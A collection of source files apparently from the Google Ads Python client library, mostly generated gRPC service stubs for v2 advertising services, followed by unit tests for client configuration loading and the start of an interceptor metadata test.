'/google.ads.googleads.v2.services.KeywordPlanService/GenerateForecastMetrics',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsResponse.FromString,
)
self.GenerateHistoricalMetrics = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/GenerateHistoricalMetrics',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsResponse.FromString,
)
class KeywordPlanServiceServicer(object):
"""Proto file describing the keyword plan service.
Service to manage keyword plans.
"""
def GetKeywordPlan(self, request, context):
"""Returns the requested plan in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateKeywordPlans(self, request, context):
"""Creates, updates, or removes keyword plans. Operation statuses are
returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateForecastMetrics(self, request, context):
"""Returns the requested Keyword Plan forecasts.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateHistoricalMetrics(self, request, context):
"""Returns the requested Keyword Plan historical metrics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_KeywordPlanServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetKeywordPlan': grpc.unary_unary_rpc_method_handler(
servicer.GetKeywordPlan,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GetKeywordPlanRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__plan__pb2.KeywordPlan.SerializeToString,
),
'MutateKeywordPlans': grpc.unary_unary_rpc_method_handler(
servicer.MutateKeywordPlans,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansResponse.SerializeToString,
),
'GenerateForecastMetrics': grpc.unary_unary_rpc_method_handler(
servicer.GenerateForecastMetrics,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateForecastMetricsResponse.SerializeToString,
),
'GenerateHistoricalMetrics': grpc.unary_unary_rpc_method_handler(
servicer.GenerateHistoricalMetrics,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GenerateHistoricalMetricsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.KeywordPlanService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/keyword_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import keyword_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__view__pb2
from google.ads.google_ads.v2.proto.services import keyword_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__view__service__pb2
class KeywordViewServiceStub(object):
"""Proto file describing the Keyword View service.
Service to manage keyword views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetKeywordView = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordViewService/GetKeywordView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__view__service__pb2.GetKeywordViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__view__pb2.KeywordView.FromString,
)
class KeywordViewServiceServicer(object):
"""Proto file describing the Keyword View service.
Service to manage keyword views.
"""
def GetKeywordView(self, request, context):
"""Returns the requested keyword view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_KeywordViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetKeywordView': grpc.unary_unary_rpc_method_handler(
servicer.GetKeywordView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__view__service__pb2.GetKeywordViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__view__pb2.KeywordView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.KeywordViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/landing_page_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import landing_page_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_landing__page__view__pb2
from google.ads.google_ads.v2.proto.services import landing_page_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_landing__page__view__service__pb2
class LandingPageViewServiceStub(object):
"""Proto file describing the landing page view service.
Service to fetch landing page views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetLandingPageView = channel.unary_unary(
'/google.ads.googleads.v2.services.LandingPageViewService/GetLandingPageView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_landing__page__view__service__pb2.GetLandingPageViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_landing__page__view__pb2.LandingPageView.FromString,
)
class LandingPageViewServiceServicer(object):
"""Proto file describing the landing page view service.
Service to fetch landing page views.
"""
def GetLandingPageView(self, request, context):
"""Returns the requested landing page view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LandingPageViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetLandingPageView': grpc.unary_unary_rpc_method_handler(
servicer.GetLandingPageView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_landing__page__view__service__pb2.GetLandingPageViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_landing__page__view__pb2.LandingPageView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.LandingPageViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/managed_placement_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import managed_placement_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_managed__placement__view__pb2
from google.ads.google_ads.v2.proto.services import managed_placement_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_managed__placement__view__service__pb2
class ManagedPlacementViewServiceStub(object):
"""Proto file describing the Managed Placement View service.
Service to manage Managed Placement views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetManagedPlacementView = channel.unary_unary(
'/google.ads.googleads.v2.services.ManagedPlacementViewService/GetManagedPlacementView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_managed__placement__view__service__pb2.GetManagedPlacementViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_managed__placement__view__pb2.ManagedPlacementView.FromString,
)
class ManagedPlacementViewServiceServicer(object):
"""Proto file describing the Managed Placement View service.
Service to manage Managed Placement views.
"""
def GetManagedPlacementView(self, request, context):
"""Returns the requested Managed Placement view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ManagedPlacementViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetManagedPlacementView': grpc.unary_unary_rpc_method_handler(
servicer.GetManagedPlacementView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_managed__placement__view__service__pb2.GetManagedPlacementViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_managed__placement__view__pb2.ManagedPlacementView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.ManagedPlacementViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/media_file_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import media_file_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_media__file__pb2
from google.ads.google_ads.v2.proto.services import media_file_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2
class MediaFileServiceStub(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetMediaFile = channel.unary_unary(
'/google.ads.googleads.v2.services.MediaFileService/GetMediaFile',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.FromString,
)
self.MutateMediaFiles = channel.unary_unary(
'/google.ads.googleads.v2.services.MediaFileService/MutateMediaFiles',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.FromString,
)
class MediaFileServiceServicer(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def GetMediaFile(self, request, context):
"""Returns the requested media file in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateMediaFiles(self, request, context):
"""Creates media files. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MediaFileServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetMediaFile': grpc.unary_unary_rpc_method_handler(
servicer.GetMediaFile,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.SerializeToString,
),
'MutateMediaFiles': grpc.unary_unary_rpc_method_handler(
servicer.MutateMediaFiles,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.MediaFileService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/product_bidding_category_constant_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import product_bidding_category_constant_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_product__bidding__category__constant__pb2
from google.ads.google_ads.v2.proto.services import product_bidding_category_constant_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_product__bidding__category__constant__service__pb2
class ProductBiddingCategoryConstantServiceStub(object):
"""Proto file describing the Product Bidding Category constant service
Service to fetch Product Bidding Categories.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetProductBiddingCategoryConstant = channel.unary_unary(
'/google.ads.googleads.v2.services.ProductBiddingCategoryConstantService/GetProductBiddingCategoryConstant',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_product__bidding__category__constant__service__pb2.GetProductBiddingCategoryConstantRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_product__bidding__category__constant__pb2.ProductBiddingCategoryConstant.FromString,
)
class ProductBiddingCategoryConstantServiceServicer(object):
"""Proto file describing the Product Bidding Category constant service
Service to fetch Product Bidding Categories.
"""
def GetProductBiddingCategoryConstant(self, request, context):
"""Returns the requested Product Bidding Category in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ProductBiddingCategoryConstantServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetProductBiddingCategoryConstant': grpc.unary_unary_rpc_method_handler(
servicer.GetProductBiddingCategoryConstant,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_product__bidding__category__constant__service__pb2.GetProductBiddingCategoryConstantRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_product__bidding__category__constant__pb2.ProductBiddingCategoryConstant.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.ProductBiddingCategoryConstantService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/topic_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import topic_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_topic__view__pb2
from google.ads.google_ads.v2.proto.services import topic_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_topic__view__service__pb2
class TopicViewServiceStub(object):
"""Proto file describing the Topic View service.
Service to manage topic views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetTopicView = channel.unary_unary(
'/google.ads.googleads.v2.services.TopicViewService/GetTopicView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_topic__view__service__pb2.GetTopicViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_topic__view__pb2.TopicView.FromString,
)
class TopicViewServiceServicer(object):
"""Proto file describing the Topic View service.
Service to manage topic views.
"""
def GetTopicView(self, request, context):
"""Returns the requested topic view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TopicViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetTopicView': grpc.unary_unary_rpc_method_handler(
servicer.GetTopicView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_topic__view__service__pb2.GetTopicViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_topic__view__pb2.TopicView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.TopicViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/user_location_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import user_location_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_user__location__view__pb2
from google.ads.google_ads.v2.proto.services import user_location_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_user__location__view__service__pb2
class UserLocationViewServiceStub(object):
"""Proto file describing the UserLocationView service.
Service to manage user location views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetUserLocationView = channel.unary_unary(
'/google.ads.googleads.v2.services.UserLocationViewService/GetUserLocationView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_user__location__view__service__pb2.GetUserLocationViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_user__location__view__pb2.UserLocationView.FromString,
)
class UserLocationViewServiceServicer(object):
"""Proto file describing the UserLocationView service.
Service to manage user location views.
"""
def GetUserLocationView(self, request, context):
"""Returns the requested user location view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_UserLocationViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetUserLocationView': grpc.unary_unary_rpc_method_handler(
servicer.GetUserLocationView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_user__location__view__service__pb2.GetUserLocationViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_user__location__view__pb2.UserLocationView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.UserLocationViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: google-ads-python/tests/client_test.py
```python
import os
import mock
import yaml
from importlib import import_module
from pyfakefs.fake_filesystem_unittest import TestCase as FileTestCase
from google.ads.google_ads import client as Client
latest_version = Client._DEFAULT_VERSION
valid_versions = Client._VALID_API_VERSIONS
services_path = 'google.ads.google_ads.{}.proto.services'.format(latest_version)
services = import_module(services_path)
class GoogleAdsClientTest(FileTestCase):
"""Tests for the google.ads.googleads.client.GoogleAdsClient class."""
def _create_test_client(self, endpoint=None):
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials'
) as mock_credentials:
mock_credentials_instance = mock_credentials.return_value
mock_credentials_instance.refresh_token = self.refresh_token
mock_credentials_instance.client_id = self.client_id
mock_credentials_instance.client_secret = self.client_secret
client = Client.GoogleAdsClient(mock_credentials_instance,
self.developer_token, endpoint=endpoint)
return client
def setUp(self):
self.setUpPyfakefs()
self.developer_token = 'abc123'
self.client_id = 'client_id_123456789'
self.client_secret = 'client_secret_987654321'
self.refresh_token = '<PASSWORD>'
self.login_customer_id = '1234567890'
self.path_to_private_key_file = '/test/path/to/config.json'
self.delegated_account = '<EMAIL>'
def test_get_client_kwargs_login_customer_id(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'login_customer_id': self.login_customer_id}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': None,
'login_customer_id': self.login_customer_id,
'logging_config': None
})
def test_get_client_kwargs_login_customer_id_as_None(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'login_customer_id': None}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': None,
'login_customer_id': None,
'logging_config': None
})
def test_get_client_kwargs(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': None,
'login_customer_id': None,
'logging_config': None
})
def test_get_client_kwargs_custom_endpoint(self):
endpoint = 'alt.endpoint.com'
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'endpoint': endpoint}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': endpoint,
'login_customer_id': None,
'logging_config': None
})
def test_load_from_dict(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_dict(config)
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_storage()
mock_credentials.assert_called_once_with(
config.get('client_id'),
config.get('client_secret'),
config.get('refresh_token'))
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage_login_cid_int(self):
login_cid = 1234567890
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'login_customer_id': login_cid}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_storage()
mock_credentials.assert_called_once_with(
config.get('client_id'),
config.get('client_secret'),
config.get('refresh_token'))
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=str(login_cid),
logging_config=None)
def test_load_from_storage_custom_path(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
file_path = 'test/google-ads.yaml'
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
Client.GoogleAdsClient.load_from_storage(path=file_path)
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage_file_not_found(self):
wrong_file_path = 'test/wrong-google-ads.yaml'
self.assertRaises(
IOError,
Client.GoogleAdsClient.load_from_storage,
path=wrong_file_path)
def test_load_from_storage_required_config_missing(self):
config = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token
}
file_path = 'test/google-ads.yaml'
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
self.assertRaises(
ValueError,
Client.GoogleAdsClient.load_from_storage,
path=file_path)
def test_load_from_storage_service_account_config(self):
config = {
'developer_token': self.developer_token,
'path_to_private_key_file': self.path_to_private_key_file,
'delegated_account': self.delegated_account
}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_service_account_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_storage()
mock_credentials.assert_called_once_with(
config.get('path_to_private_key_file'),
config.get('delegated_account'))
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage_service_account_no_delegated_account(self):
config = {
'developer_token': self.developer_token,
'path_to_private_key_file': self.path_to_private_key_file}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None), mock.patch.object(
Client.oauth2,
'get_service_account_credentials',
return_value=mock_credentials_instance):
self.assertRaises(
ValueError,
Client.GoogleAdsClient.load_from_storage)
def test_get_service(self):
# Retrieve service names for all defined service clients.
for ver in valid_versions:
services_path = 'google.ads.google_ads.%s' % ver
service_names = [
'%s%s' % (name.rsplit('ServiceClient')[0], 'Service')
for name in dir(import_module(services_path))
if 'ServiceClient' in name]
client = self._create_test_client()
# Iterate through retrieval of all service clients by name.
for service_name in service_names:
client.get_service(service_name)
def test_get_service_custom_endpoint(self):
service_name = 'GoogleAdsService'
service_module_base = 'google_ads_service'
grpc_transport_class_name = '%sGrpcTransport' % service_name
grpc_transport_module_name = '%s_grpc_transport' % service_module_base
transport_create_channel_path = (
'google.ads.google_ads.%s.services.transports.%s.%s.create_channel'
% (Client._DEFAULT_VERSION,
grpc_transport_module_name,
grpc_transport_class_name))
endpoint = 'alt.endpoint.com'
client = self._create_test_client(endpoint=endpoint)
# The GRPC transport's create_channel method is what allows the
# GoogleAdsClient to specify a custom endpoint. Here we mock the
# create_channel method in order to verify that it was given the
# endpoint specified by the client.
with mock.patch(transport_create_channel_path) as mock_create_channel:
# A new channel is created during initialization of the service
# client.
client.get_service(service_name)
mock_create_channel.assert_called_once_with(
address=endpoint, credentials=client.credentials,
options=Client._GRPC_CHANNEL_OPTIONS)
def test_get_service_not_found(self):
client = self._create_test_client()
self.assertRaises(ValueError, client.get_service, 'BadService')
def test_get_service_invalid_version(self):
client = self._create_test_client()
self.assertRaises(ValueError, client.get_service, 'GoogleAdsService',
version='bad_version')
def test_get_service_with_version(self):
client = self._create_test_client()
try:
client.get_service('GoogleAdsService', version=latest_version)
except Exception:
self.fail('get_service with a valid version raised an error')
# XXX: deferred test for fixing lazy loading
# def test_get_service_with_interceptor(self):
# client = self._create_test_client()
#
# class Interceptor:
# pass
#
# interceptor = Interceptor()
#
# with mock.patch.object(
# Client,
# 'intercept_channel'
# ) as mock_intercept_channel:
# client.get_service('GoogleAdsService', interceptors=[interceptor])
# first_interceptor = mock_intercept_channel.call_args[0][1]
# self.assertEqual(first_interceptor, interceptor)
#
def test_get_type(self):
for ver in valid_versions:
# Retrieve names for all types defined in pb2 files.
type_path = f'google.ads.google_ads.{ver}.types'
type_names = import_module(type_path).__all__
# Iterate through retrieval of all types by name.
for name in type_names:
if name.lower().endswith('pb2'):
continue
Client.GoogleAdsClient.get_type(
name, version=ver)
def test_get_type_not_found(self):
self.assertRaises(
ValueError, Client.GoogleAdsClient.get_type,
'BadType')
def test_get_type_invalid_version(self):
self.assertRaises(
ValueError, Client.GoogleAdsClient.get_type,
'GoogleAdsFailure', version='bad_version')
def test_init_no_logging_config(self):
"""Should only call logging.config.dictConfig if logging config exists.
"""
with mock.patch(
'logging.config.dictConfig'
) as mock_dictConfig, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials'
) as mock_credentials:
mock_credentials_instance = mock_credentials.return_value
mock_credentials_instance.refresh_token = self.refresh_token
mock_credentials_instance.client_id = self.client_id
mock_credentials_instance.client_secret = self.client_secret
Client.GoogleAdsClient(mock_credentials_instance,
self.developer_token)
mock_dictConfig.assert_not_called()
def test_init_with_logging_config(self):
"""Configured LoggingInterceptor should call logging.dictConfig.
"""
config = {'test': True}
with mock.patch(
'logging.config.dictConfig'
) as mock_dictConfig, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials'
) as mock_credentials:
mock_credentials_instance = mock_credentials.return_value
mock_credentials_instance.refresh_token = self.refresh_token
mock_credentials_instance.client_id = self.client_id
mock_credentials_instance.client_secret = self.client_secret
Client.GoogleAdsClient(mock_credentials_instance,
self.developer_token, logging_config=config)
mock_dictConfig.assert_called_once_with(config)
```
#### File: tests/interceptors/interceptor_mixin.py
```python
from unittest import TestCase
from google.ads.google_ads.interceptors.interceptor_mixin import \
InterceptorMixin
class InterceptorMixinTest(TestCase):
def test_get_request_id_from_metadata(self):
"""Ensures request-id is retrieved from metadata tuple."""
mock_metadata = (('request-id', '123456'),)
result = InterceptorMixin.get_request_id_from_metadata(mock_metadata)
self.assertEqual(result, '123456')
def test_get_request_id_no_id(self):
"""Ensures None is returned if metadata does't contain a request ID."""
mock_metadata = (('another-key', 'another-val'),)
result = (InterceptorMixin.get_request_id_from_metadata(mock_metadata))
self.assertEqual(result, None)
def test_parse_metadata_to_json(self):
mock_metadata = [
('x-goog-api-client',
'gl-python/123 grpc/123 gax/123'),
('developer-token', '<PASSWORD>'),
